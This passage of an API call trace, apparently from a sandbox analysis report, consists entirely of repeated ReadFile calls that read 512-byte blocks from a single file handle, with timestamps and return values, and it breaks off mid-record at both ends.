lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, 
lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.969] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.969] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.969] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.969] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.969] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, 
lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.969] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.969] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.969] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.969] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.969] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.969] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.969] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.970] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.970] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: 
lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.970] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.970] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.970] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.970] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.970] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.970] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.970] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.970] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.970] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, 
lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.970] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, 
lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile 
(in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 
[0128.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, 
lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, 
lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, 